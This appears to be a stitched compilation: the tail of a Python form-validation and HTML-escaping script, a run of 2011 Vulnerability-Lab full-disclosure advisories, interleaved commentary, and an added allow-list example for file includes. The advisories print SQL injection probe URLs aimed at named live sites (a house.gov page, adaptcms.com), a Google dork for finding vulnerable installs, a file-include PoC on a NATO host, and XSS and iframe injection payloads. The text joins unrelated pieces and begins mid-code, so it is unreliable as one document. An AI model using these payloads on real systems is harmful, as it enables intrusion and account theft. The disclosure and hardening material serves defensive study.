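        return str(ipaddress.IPv4Address(v))   # AddressValueError is a ValueError
    if name == "subnetmask":
        mask = ipaddress.IPv4Address(v)
        if not _is_contiguous_mask(mask):
            raise ValueError("non-contiguous subnet mask: %r" % v)
        return str(mask)
    if name in ("hostname", "mailserver", "domainname"):
        if not HOSTNAME_RE.match(v):
            raise ValueError("invalid hostname: %r" % v)
        return v.lower()
    if name == "testaddr":
        if not EMAIL_RE.match(v):
            raise ValueError("invalid e-mail address: %r" % v)
        return v
    raise ValueError("unknown field: %r" % name)


def safe_form_fields(submitted):
    """Validate every submitted field; return (accepted, rejected) dicts so the
    caller can store only the accepted values and report the rest."""
    accepted, rejected = {}, {}
    for name, value in submitted.items():
        try:
            accepted[name] = validate_field(name, value)
        except ValueError as exc:
            rejected[name] = str(exc)
    return accepted, rejected


def render_input(name, value, input_type="text"):
    """Attribute-value context: quote=True also escapes the double quote, so a
    stored value cannot close the attribute and start a new tag."""
    return '<input type="%s" name="%s" value="%s">' % (
        html.escape(input_type, quote=True),
        html.escape(name, quote=True),
        html.escape(value, quote=True),
    )


def render_delete_confirm(object_name):
    """Element-text context (the Astaro popup): the object name is escaped so
    stored markup is displayed literally instead of being interpreted."""
    return ("<p>Are you sure that you want to delete the X509 certificate with "
            "private key object '%s'?</p>" % html.escape(object_name, quote=True))


if __name__ == "__main__":
    ok, bad = safe_form_fields({"ipaddress": "193.120.238.59--test",
                                "subnetmask": "255.255.255.248",
                                "hostname": "demo.spamtitan.com"})
    print("accepted:", ok)
    print("rejected:", bad)
    print(render_input("hostname", '"><script>alert(1)</script>'))
```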
[Full-disclosure] CertificationMagazine - Blind SQL Injection Vulnerability
Title: CertificationMagazine - Blind SQL Injection Vulnerability
Date: 2011-12-19
VL-ID: 269
Reference: http://www.vulnerability-lab.com/get_content.php?id=269

Introduction:
Certification Magazine is a technical training and certification publication designed to deliver the most current information available about technical certification programs from a variety of vendors. The publication offers a comprehensive view of the market and provides information about how to obtain the certification best suited to one's career. Certification Magazine examines career options and profiles certified professionals who lead the industry. Editorial components include: Cover stories and columns on important industry events, issues and trends; Interviews with industry leaders; Updates of requirements and benefits of specific certification programs; Listings and comments about new exams; Industry Analysis; and a compendium of industry events including Certification Magazine's conferences and seminars.
(Copy of the Vendor Website: http://www.certmag.com/aboutus.php)

Abstract:
Vulnerability-Lab Team discovered a critical remote Blind SQL Injection vulnerability on the Certification Magazine website.

Report-Timeline:
2011-12-19: Public or Non-Public Disclosure

Status: Published

Affected Products:

Exploitation-Technique: Remote
Severity: Critical

Details:
A SQL Injection vulnerability is detected on the website of Certification Magazine. Successful exploitation of the vulnerability allows an attacker to inject own sql statements/commands via the parameter request ?in=

Vulnerable Module(s):
[+] in

--- SQL Error Logs ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `3656m/read.php?in=3656` at line 1

Pictures:
../1.png

Proof of Concept:
The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...

Reference:
http://www.certmag.com/read.php?in=3656m/read.php?in=3656'

PoC:

Risk:
The security risk of the remote sql injection vulnerability is estimated as critical.

Credits:
Vulnerability Research Laboratory - Chokri B.A.

Copyright © 2011|Vulnerability-Lab
[Full-disclosure] Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability
Title: Kaspersky ISAV 2011/12 - Memory Corruption Vulnerability
Date: 2011-12-19
References: http://www.vulnerability-lab.com/get_content.php?id=129
VL-ID: 129

Introduction:
Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you're surfing the web. It provides constant protection for you and your family – whether you work, bank, shop or play online. Kaspersky Anti-Virus 2011 – the backbone of your PC's security system, offering real-time automated protection from a range of IT threats. Kaspersky Anti-Virus 2011 provides the basic tools needed to protect your PC. Our award-winning technologies work silently in the background while you enjoy your digital life.
(Copy of Vendor Homepage: http://www.kaspersky.com/kaspersky_anti-virus http://www.kaspersky.com/kaspersky_internet_security)

Abstract:
Vulnerability-Lab Team discovered a Memory Pointer Corruption Vulnerability on Kaspersky Internet Security 2011/2012 and Kaspersky Anti-Virus 2011/2012.

Report-Timeline:
2010-12-04: Vendor Notification
2011-01-16: Vendor Response/Feedback
2011-12-19: Public or Non-Public Disclosure

Status: Published

Affected Products:

Exploitation-Technique: Local
Severity: Medium

Details:
A Memory Corruption vulnerability is detected on Kaspersky Internet Security 2011/2012 and Kaspersky Anti-Virus 2011/2012. The vulnerability is caused by an invalid pointer corruption when processing a corrupt .cfg file through the Kaspersky exception filters, which could be exploited by attackers to crash the complete software process. The bug is located in basegui.ppl / basegui.dll when processing a .cfg file import.

Vulnerable Modules:
[+] CFG IMPORT

Affected Version(s):
Kaspersky Anti-Virus 2012
Kaspersky Internet Security 2012
KIS 2012 v12.0.0.374
KAV 2012 v12.x
Kaspersky Anti-Virus 2011
Kaspersky Internet Security 2011
KIS 2011 v11.0.0.232 (a.b)
KAV 11.0.0.400
KIS 2011 v12.0.0.374
Kaspersky Anti-Virus 2010
Kaspersky Internet Security 2010

--- Kaspersky Bug Logs ---
Folder: ../Analyses/Crash Reports (KISKAV)
KAV.11.0.0.232_08.04_22.24_3620.GUI.full.dmp
KAV.11.0.0.232_08.04_22.24_3620.GUI.mini.dmp
KAV.11.0.0.232_08.04_22.24_3620.GUI.tiny.dmp
KAV.11.0.0.232_08.04_22.28_2956.GUI.full.dmp
KAV.11.0.0.232_08.04_22.28_2956.GUI.mini.dmp
KAV.11.0.0.232_08.04_22.28_2956.GUI.tiny.dmp
KAV.11.0.0.232?_08.04_23.21_3712.GUI.full.dmp
KAV.11.0.0.232?_08.04_23.21_3712.GUI.mini.dmp
KAV.11.0.0.232?_08.04_23.21_3712.GUI.tiny.dmp
KAV.11.0.0.232?_08.04_23.54_2640.GUI.full.dmp
KAV.11.0.0.232?_08.04_23.54_2640.GUI.mini.dmp
KAV.11.0.0.232?_08.04_23.54_2640.GUI.tiny.dmp

Reference(s):
../Analyses/Crash Reports (KISKAV)/kav_x32.rar
../Analyses/Crash Reports (KISKAV)/kis_x32-win7.zip
../Analyses/Crash Reports (KISKAV)/kis_x64.zip

--- Service Crash Report Queue Logs ---
Folder: ../Analyses/Crash Reports (Service)

Version=1
EventType=APPCRASH
EventTime=129256270253026260
ReportType=2
Consent=1
UploadTime=129256270260076663
ReportIdentifier=d70927a2-a1d7-11df-81a1-95fa4108d4d6
IntegratorReportIdentifier=d70927a1-a1d7-11df-81a1-95fa4108d4d6
WOW64=1
Response.BucketId=1985200055
Response.BucketTable=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=avp.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=11.0.1.400
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4c2cd011
Sig[3].Name=Fehlermodulname
Sig[3].Value=basegui.ppl
Sig[4].Name=Fehlermodulversion
Sig[4].Value=11.0.1.400
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=4c2cd193
Sig[6].Name=Ausnahmecode
Sig[6].Value=c005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00079c3c
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.1.7600.2.0.0.768.3
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=0a9e
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=0a9e
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
UI[2]=C://Program Files (x86)/Kaspersky Lab/Kaspersky Internet Security 2011/avp.exe
UI[3]=Kaspersky Anti-Virus funktioniert nicht mehr
UI[4]=Windows
[Full-disclosure] Whois Cart Billing - Multiple Web Vulnerabilities
Title: Whois Cart Billing - Multiple Web Vulnerabilities
Date: 2011-12-22
References: http://www.vulnerability-lab.com/get_content.php?id=343
VL-ID: 343

Introduction:
Whois.Cart() is a client/administrator tool that facilitates the many tasks involved in running an efficient webhosting and domain registration business. The system will surgically undertake every aspect of your client transactions; first the sale (which is most important and most overlooked), the collection of money, the registration/transfer/renewal of domains, the provisioning of hosting space, and lastly the maintenance of all these. A cumulation of countless development hours and thousands of user suggestions, Whois.Cart() is a full-featured system that has retained the clean and simple ethic that most of its equal-featured competing products have lost. It will undoubtedly become the most natural and effective resource with which you will ever complement your business.
(Copy of the Vendor Homepage: http://whoiscart.net/product.php)

Abstract:
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities on the Whois.Cart Hosting Billing Solution Software.

Report-Timeline:
2011-11-21: Vendor Notification
2011-12-22: Public or Non-Public Disclosure

Status: Published

Exploitation-Technique: Remote
Severity: High

Details:
1.1 Multiple persistent input validation vulnerabilities are detected on the Whois.Cart Hosting Billing Solution Software. The vulnerability allows a remote attacker or local low privileged user account to inject persistent script code like JS/HTML. Successful exploitation can result in session hijacking, phishing and persistent content manipulation.

Vulnerable Module(s):
[+] hostinginterfaces
[+] domain ordering

Picture(s):
../hostinginterfaces.png
../xss-whoiscart.png

1.2 Another vulnerability was detected on the Whois.cart Software, and it allows a remote attacker to read all the customers' cPanel logins and passwords without encryption.

Vulnerable Module(s):
[+] cPanel Log

Proof of Concept:
The vulnerability can be exploited by remote attackers with required user interaction or by local low privileged user accounts. For demonstration or reproduce ...

1.1 [*] Persistent Cross Site Scripting

Vulnerable Module(s):
[+] Order - Choose domain name

Review: Order page

tr th Domain Setup( script alert(VLAB); /script ) /th th Price -$ 0 /th th a href=' delete.php?delid=401' Delete From Cart /a /th /tr
tr td colspan='3' /td /tr
tr th P1( script alert(Me!ster); /script = [x] ) /th th Price Monthly-$ 100 br Price Yearly-$ 1000 /th th a href='delete.php?delid=400' Delete From Cart /a /th /tr
tr td colspan='3' P1 /td /tr

1.2 [*] cPanel Log

Reference(s):
http://www.[SERVER].com/whoiscart/admin/hostinginterfaces/cpanel_2_log.htm

Risk:
The security risk of the persistent input validation vulnerabilities is estimated as High(-).
The security risk of the cp log access rights is estimated as low(+).

Credits:
Vulnerability Research Laboratory - Chokri B.A. (Me!ster)

Copyright © 2011|Vulnerability-Lab
[Full-disclosure] Content Papst CMS v2011.2 - Multiple Web Vulnerabilities
Title: Content Papst CMS v2011.2 - Multiple Web Vulnerabilities
Date: 2011-12-18
References: http://www.vulnerability-lab.com/get_content.php?id=363
VL-ID: 363

Introduction:
Contentpapst is a powerful and very flexible content management system (CMS) designed specifically for small and medium-sized businesses, public authorities and organizations. With the Contentpapst CMS you will in future manage your company homepage, your club website etc. entirely from the browser, without additional software!
(Copy of the Vendor Homepage: http://www.sandoba.de/produkte/cms-contentpapst/)

Abstract:
Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Content Papst CMS v2011.2

Report-Timeline:
2011-12-18: Public or Non-Public Disclosure

Status: Published

Exploitation-Technique: Remote
Severity: Medium

Details:
1.1 Multiple persistent input validation vulnerabilities are detected on the famous Content Papst v2011.2 Content Management System. The vulnerability allows a remote attacker or local low privileged cp user account to inject own malicious script code on the application side (persistent) of the web service. Successful exploitation of the vulnerability can result in persistent content manipulation of the vulnerable modules, phishing and session hijacking.

Vulnerable Module(s):
[+] Categorie = Titel/Beschreibung/Permalink
[+] Links = Titel/URL/Beschreibung
[+] Artikel-Categorie = Titel/Beschreibung/Permalink
[+] Artikel = Titel/Beschreibung/Permalink
[+] News = Name/Beschreibung/URL

Picture(s):
../1.png
../2.png

1.2 Multiple non-persistent cross site scripting vulnerabilities are detected on the famous Content Papst v2011.2 Content Management System. The vulnerability allows an attacker (remote) to hijack customer/admin/moderator/user accounts via cross site scripting. Successful exploitation of the vulnerability can result in account theft and client-side content manipulation on requests.

Vulnerable Module(s):
[+] Dateiverwaltung - Topic [Name, Path Folder]
[+] News - Search Parameter

Picture(s):
../3.png

1.3 An information/path disclosure issue is detected on the famous Content Papst v2011.2 Content Management System. A mistake in the regular expression format output displays sensitive information to remote attackers via the path error.

Vulnerable Module(s):
[+] Search File Overview

--- Exception Logs ---
Warning: preg_match() [function.preg-match]: No ending delimiter '/' found in /kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php on line 563
Warning: preg_match() [function.preg-match]: No ending delimiter found in /kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php on line 563
Warning: preg_match() [function.preg-match]: No ending delimiter found in /kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php on line 563
Warning: preg_match() [function.preg-match]: No ending delimiter found in /kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php on line 563
Warning: preg_match() [function.preg-match]: No ending delimiter found in /kunden/282246_12XXX/cms-test.com/demoversion/modules/upload/class.admin.php on line 563
Warning: preg_match() [function.preg-match]: No ending delimiter found in /kunden/282246_12XXX/cms-test.com/demoversion/modules

Picture(s):
../4.png

Proof of Concept:
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ...

1.1 - Title Beschreibung - Categories

tr class=layout_table_row_1
th valign=top 3 /th
td valign=top width=150 a href=/demoversion/admin.php?file=news&mode=edit_category&number=3 hacker23 iframe src=http://vulnerability-lab.com width=1000 height=800 /a /td
td valign=top em Keine Beschreibung verfügbar. /em /td
td width=130 valign=top Öffentlich verfügbar /td
td valign=top a href=http://www.XXX.com/[PATH]/news-category-3.html; title=Zur Webseite wechseln img
[Full-disclosure] Adapt CMS v2.0.1 - SQL Injection Vulnerability
Title:
======
Adapt CMS v2.0.1 - SQL Injection Vulnerability

Date:
=====
2011-11-25

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=341

VL-ID:
=====
341

Introduction:
=============
AdaptCMS is brought to you by Insane Visions, with the v2.0.1 versions being the first big step in the new generation
of software being released by Insane Visions. AdaptCMS is a long-term development of an idea that started as a gaming
CMS where you can easily control your website (OneCMS), to being usable on any content website. The AdaptCMS system
has always strived to provide that along with great support, continued updates and just a great CMS altogether. With
the 1.x expiring soon, the 2.x series will pick up as a free-only script (GPL), completely re-written, with a brand
new design and more possibilities.
(Copy of the Vendor Homepage: http://www.adaptcms.com/page/34/about)

Abstract:
=========
A Vulnerability-Lab researcher discovered a critical SQL injection vulnerability in AdaptCMS v2.0.1.

Report-Timeline:
================
2011-11-25: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
An SQL injection vulnerability was detected in AdaptCMS v2.0.1. The bug allows a remote attacker to inject and
execute SQL statements through the vulnerable request parameter. Successful exploitation can lead to compromise of
the DBMS and the CMS.

Vulnerable Module(s):
    [+] article

Vulnerable Param(s):
    [+] Page ID (the numeric article ID in the /article/ path)

Pictures:
    ../adapt.png

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers.
For demonstration or reproduce ...

PoC:
http://site/[AdaptCMS Installation Path]/article/'[Article ID]/[Page Name]/[Article Title]

Errors:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 262
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 293

The two warnings show that the result of the failed mysql_query() call is passed to mysql_fetch_row() and
mysql_num_rows() without being checked, and that PHP error display is enabled on the affected hosts, so the
absolute installation path is disclosed alongside the injection point.

Full: (examples)
http://www.adaptcms.com/article/'66/Blog/AdaptCMS-20-March-26th
http://www.adaptcms.com/article/'75/News/AdaptCMS-200-Released
http://www.rock.insanevisions.com/article/'293/Album/Pink-Floyd-Animals
http://www.insanevisions.com/article/'294/News/AdaptCMS-202-Update

Dorks:
intext:Powered by AdaptCMS OR Powered by AdaptCMS

Risk:
=====
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
========
Vulnerability Research Laboratory - X-Cisadane

Greetz to: X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari,
Anharku, Array XCrew, Remick Kuzmanovic

Vulnerability Researcher Profile: http://www.vulnerability-lab.com/show.php?user=X-Cisadane

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all
warranties, either expressed or implied, including the warranties of merchantability and capability for a particular
purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect,
incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of
liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or
reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2011 | Vulnerability-Lab

--
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype Vendor Website - Cross Site Scripting Vulnerability
Title:
======
Skype Vendor Website - Cross Site Scripting Vulnerability

Date:
=====
2011-11-11

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=309

VL-ID:
=====
309

Introduction:
=============
Skype is a software application that allows users to make voice and video calls and chats over the Internet. Calls to
other users within the Skype service are free, while calls to both traditional landline telephones and mobile phones
can be made for a fee using a debit-based user account system. Skype has also become popular for its additional
features which include instant messaging, file transfer, and videoconferencing. Skype has 663 million registered users
as of 2010. The network is operated by Skype Limited, which has its headquarters in Luxembourg. Most of the development
team and 44% of the overall employees of Skype are situated in the offices of Tallinn and Tartu, Estonia.
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype)

Abstract:
=========
The Vulnerability-Lab Team discovered a cross site scripting vulnerability on the Skype main vendor website.

Report-Timeline:
================
2011-11-04: Vendor Notification
2011-11-05: Vendor Response/Feedback
2011-11-10: Vendor Fix/Patch
2011-11-11: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Low

Details:
========
A non-persistent cross site scripting vulnerability was detected on the Skype vendor website. It allows remote
attackers to hijack Skype customer sessions via cross site scripting. Successful exploitation of the client-side
vulnerability can result in session hijacking and account theft.

Vulnerable Module(s):
    [+] Subscriptions to call a single country

Affected Module(s):
    [+] Skype.com

Picture(s):
    ../ive1.png
    ../ive2.png
    ../ive3.png

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers on the client side; user interaction is required.
For demonstration or reproduce ...

PoC:
<img src="tester1337.png" onerror="alert('CROSS-SITE-SCRIPTING')" />

Reference(s):
www.skype.com/intl/en/prices/pay-monthly-new

Risk:
=====
The security risk of the non-persistent cross site scripting vulnerability is estimated as low(+).

Credits:
========
Vulnerability Research Laboratory - Aditya Gupta
[Full-disclosure] iGuard Biometric Access Control - Multiple Vulnerabilities
Title:
======
iGuard Biometric Access Control - Multiple Vulnerabilities

Date:
=====
2011-11-08

References:
===========
2011/Q3-4
URL: http://vulnerability-lab.com/get_content.php?id=104

VL-ID:
=====
104

Introduction:
=============
Each iGuard Biometric / Smart Card Security Appliance has a built-in web server that enables all the computers in the
corporate network to directly and simultaneously access the device using any Internet browser, such as Microsoft
Internet Explorer or Netscape Navigator. Different computer platforms such as Apple Macintosh, Microsoft Windows and
Linux machines can access the device. No additional software is required. So whether you are in an airport lounge or
a hotel room, you can always check if your employees are already in the office or not, and you can even control,
modify or disable their access rights to your office remotely via an Internet connection, provided your iGuard
Biometric / Smart Card Security Appliance is connected to an external IP address or your network is available through
a VPN connection that is reachable from your location.
(Copy of the Vendor Website: http://iguard.me/iguard-access-control.html)

Abstract:
=========
The Vulnerability-Lab Team discovered multiple persistent and non-persistent input validation vulnerabilities in the
iGuard Biometric Access Control application.

Report-Timeline:
================
2011-09-01: Public or Non-Public Disclosure

Status:
========
Published

Affected Products:
==================

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
1.1
Multiple persistent input validation vulnerabilities were detected in the iGuard Biometric Access Control
application. They allow a local privileged user account, or a remote attacker (with user interaction), to manipulate
the vulnerable application sections. Successful exploitation can lead to session hijacking and manipulation of the
vulnerable application modules via persistent injection.

Vulnerable Module(s): (Persistent)
    [+] Select Month
    [+] New Access Record - ID
    [+] Department ID & Description

1.2
A client-side cross site scripting vulnerability was detected in the iGuard Biometric Access Control application. The
bug allows a remote attacker to attack a customer on the client side (high user interaction required). Successful
exploitation can result in phishing of passwords or manipulation of content when processing client-side requests.

Vulnerable Module(s): (Non-Persistent)
    [+] Employee Record

Pictures:
    ../1.png
    ../2.png
    ../3.png
    ../4.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts.
For demonstration or reproduce ...

PoC: (Persistent)
../database.cgi.htm

Risk:
=====
The security risk of the persistent web vulnerabilities is estimated as medium.
The security risk of the client-side vulnerability is estimated as low.

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability
Title:
======
Joomla Component (com_content) - Blind SQL Injection Vulnerability

Date:
=====
2011-11-11

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=323

VL-ID:
=====
323

Introduction:
=============
Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and
intranets and a model-view-controller (MVC) web application framework that can also be used independently. Joomla is
written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs,
polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between
March 2007 and February 2011 there had been more than 21 million downloads. There are over 7,400 free and commercial
extensions available from the official Joomla! Extension Directory and more available from other sources.
(Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)

Abstract:
=========
A Vulnerability Laboratory researcher discovered a blind SQL injection vulnerability in the com_content component of
the Joomla CMS.

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A blind SQL injection vulnerability was detected in the com_content component of the Joomla CMS. It allows a remote
attacker to inject and execute SQL statements against the DBMS of the affected application. Successful exploitation
can result in compromise of the affected application's DBMS.

Vulnerable Module(s):
    [+] com_content

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers.
For demonstration or reproduce ...

1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]
2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--
3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--

Requests 2 and 3 differ only in the truth value of the appended condition; if the archive listing returned for the
two differs, the year parameter reaches the query unfiltered.

[x] Demo:
http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 or 1=0--

Risk:
=====
The security risk of the blind SQL injection vulnerability is estimated as critical.

Credits:
========
E.Shahmohamadi (IRAN)
[Full-disclosure] WhiteHouse Gov Service - Persistent Web Vulnerability
Title:
======
WhiteHouse Gov Service - Persistent Web Vulnerability

Date:
=====
2011-11-04

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=308

VL-ID:
=====
308

Introduction:
=============
http://www.whitehouse.gov/

Abstract:
=========
The Vulnerability-Lab researchers (F0x23 & Rem0ve) discovered a persistent script code injection vulnerability on the
WhiteHouse Gov website.

Report-Timeline:
================
2011-11-01: Vendor Notification
2011-11-03: Vendor Response/Feedback
2011-11-04: Vendor Fix/Patch
2011-11-04: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A persistent script code injection vulnerability was detected on the WhiteHouse Gov website. It allows remote
attackers to inject malicious script code (persistent) into a main module of the website's web service. Successful
exploitation results in hijacking of user, admin or backend sessions, manipulation of profile content, redirects to
external malicious targets (websites) and defacement, and can lead to malware infiltration via the petition pages.

Vulnerable Module(s):
    [+] Profile - Location Input

Affected Module(s):
    [+] Petition - Add, Share & Sign

Picture(s):
    ../1.png

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers.
For demonstration or reproduce ...

PoC:
<div class="entry entry-creator">
  <div class="title">creator</div>
  <div class="name">Bernd N</div><!--/name-->
  <div class="details">'INJECT/EXECUTE PERSISTENT SCRIPT CODE HERE!!<br />
    October 31, 2011<br />
    Signature # 1</div>
</div>
</div>

Reference: https://wwws.whitehouse.gov/petitions/!/petition/hey/VLsNrtR1

INPUT FORM:
<span>City: </span></label>
<input maxlength="255" name="profile_city" id="edit-profile-city" size="60" value="VA" class="form-text" type="text" />
</div>
<input name="form_id" id="edit-user-profile-form" value="user_profile_form" type="hidden" />
<div class="form-item clearfix" id="edit-profile-state-wrapper">
  <label for="edit-profile-state"><span>State: </span>

Reference: https://wwws.whitehouse.gov/user/5034619/edit/Personal%20Information

PoC:
    ../PoC.txt
    ../PoC-Full.txt
    ../PoC-Input.txt
    ../Reference.txt

Risk:
=====
The security risk of the persistent script code injection is estimated as high(+).

Credits:
========
Vulnerability Research Laboratory - Alexander Fuchs (F0x23) & Benjamin Kunz Mejri (Rem0ve)
[Full-disclosure] NATO Research Technology ORG - File Include Vulnerability
Title:
======
NATO Research Technology ORG - File Include Vulnerability

Date:
=====
2011-11-02

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=307

VL-ID:
=====
307

Introduction:
=============
The NATO Research and Technology Organisation (RTO) (Organisation pour la Recherche et la Technologie OTAN in French)
promotes and conducts co-operative scientific research and exchange of technical information amongst 26 NATO nations
and 38 NATO partners. The largest such collaborative body in the world, the RTO encompasses over 3000 scientists and
engineers addressing the complete scope of defence technologies and operational domains. This effort is supported by
an executive agency, the Research and Technology Agency (RTA), that facilitates the collaboration by organising a wide
range of studies, workshops, symposia, and other forums in which researchers can meet and exchange knowledge.
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/NATO_Research_and_Technology_Organisation)

Abstract:
=========
An anonymous Vulnerability Laboratory researcher discovered a file include vulnerability on the official NATO Research
and Technology Organisation service.

Report-Timeline:
================
2011-11-01: Vendor Notification
2011-11-01: Vendor Response/Feedback
2011-11-02: Vendor Fix/Patch
2011-11-02: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A file include vulnerability was detected on the NATO Research and Technology Organisation service. An unvalidated
application request parameter allows remote attackers to include local files. Successful exploitation of the file
inclusion may result in DBMS compromise, defacement, theft of webmail and login portal accounts, or manipulation of
service/application content.

Vulnerable Module(s):
    [+] MAIN ASP

Vulnerable Param(s):
    [+] ?topic=

Picture(s):
    ../fi_1.png

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers.
For demonstration or reproduce ...

PoC:
http://www.rto.nato.int/Main.asp?topic=images/2008/webbanner.jpg

Reference:
http://[SERVER].int/[FILE].[ASP]?[PARA]=[INCLUDE LOCAL FILE OR PATH]

The PoC value is a plain image path, not an executable page, which shows that the topic parameter is passed to the
include without any restriction on which files may be named.

Solution:
=========
To fix the security issue, restrict the request to an allowed set of files and validate the input. Add a secure
exception-handling filter to prevent future web attacks.

Risk:
=====
The security risk of the file include vulnerability is estimated as critical.

Credits:
========
Vulnerability Research Laboratory - Alexander Fuchs (f0x23) & Benjamin Kunz Mejri (Rem0ve)
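The solution above says "restrict the request to allowed files". The following is an added example, not code from the advisory or from the NATO site, that contrasts the flawed pattern (joining the topic= value to the web root and including whatever results) with an allow-list lookup. The web root, the file names in ALLOWED_TOPICS and the function names are assumptions made for the example; the real site's layout is not in the advisory.

```python
import posixpath

# Constructed web root and allow-list for the example; the real site's
# layout is not known from the advisory. topic is the attacker-controlled value.
WEB_ROOT = "/inetpub/wwwroot"
ALLOWED_TOPICS = {
    "news": "content/news.asp",
    "events": "content/events.asp",
    "publications": "content/publications.asp",
}


def resolve_vulnerable(topic: str) -> str:
    """The flawed pattern: the request value is joined to the web root and
    handed to the include as-is, so any readable file can be pulled in."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, topic))


def is_under_root(path: str) -> bool:
    """Containment check on its own: it stops ../ traversal and absolute
    paths, but still lets a jpg or a config file inside the root be included."""
    return posixpath.commonpath([WEB_ROOT, path]) == WEB_ROOT


def resolve_safe(topic: str) -> str:
    """Map the parameter to a known file through the allow-list and refuse
    everything else; the containment check stays as a second line of defence."""
    if topic not in ALLOWED_TOPICS:
        raise ValueError(f"rejected topic {topic!r}")
    path = posixpath.normpath(posixpath.join(WEB_ROOT, ALLOWED_TOPICS[topic]))
    if not is_under_root(path):
        raise ValueError("resolved path escapes the web root")
    return path


def accepts(topic: str) -> bool:
    """Convenience wrapper: does the hardened resolver accept this value?"""
    try:
        resolve_safe(topic)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for probe in ("news", "images/2008/webbanner.jpg", "../../windows/win.ini", "/etc/passwd"):
        raw = resolve_vulnerable(probe)
        print(f"{probe!r:32} vulnerable -> {raw:45} under_root={is_under_root(raw)!s:5} safe_accepts={accepts(probe)}")
```

The point of keeping is_under_root separate is that it is the check most fixes stop at: it rejects the traversal probes but would still accept the advisory's own PoC value, images/2008/webbanner.jpg, because that file lives under the web root. Only the allow-list rejects it.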
[Full-disclosure] Prosieben Community Website - Persistent Script Code Inject
Title:
======
Prosieben Community Website - Persistent Script Code Inject

Date:
=====
2011-10-31

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=306

VL-ID:
=====
306

Abstract:
=========
The Vulnerability Lab Research Team discovered a persistent script code injection vulnerability on the Prosieben
community website.

Report-Timeline:
================
2011-10-23: Vendor Notification
2011-10-24: Vendor Response/Feedback
2011-10-27: Vendor Fix/Patch
2011-11-01: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
